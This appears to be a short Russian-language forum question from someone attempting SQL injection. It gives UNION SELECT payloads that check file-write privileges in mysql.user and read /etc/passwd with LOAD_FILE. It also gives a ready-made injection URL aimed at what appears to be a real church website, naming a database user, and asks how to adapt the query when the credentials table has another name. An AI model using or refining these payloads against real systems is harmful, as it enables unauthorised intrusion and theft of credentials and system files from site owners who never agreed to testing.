проверяю на запись и пытаюсь записать так:
union+select+file_priv+from+mysql.user+where+user= 'имя юзера'
union+select+LOAD_FILE('/etc/passwd')+from+mysql.user

если на сайте таблика, где хранятся логин;пароль называется не user, то подставляю в запрос то которое на сайте? А если там нет данных о "текущем" юзвери, что делать?


например как быть тут
http://www.stmaryslutterworth.org/pages/main.php?id=-32+union+select+file_priv,2,3,4+from+mysql.user+wh ere+user='stmary_stmary'--

тут ведь нет таблицы user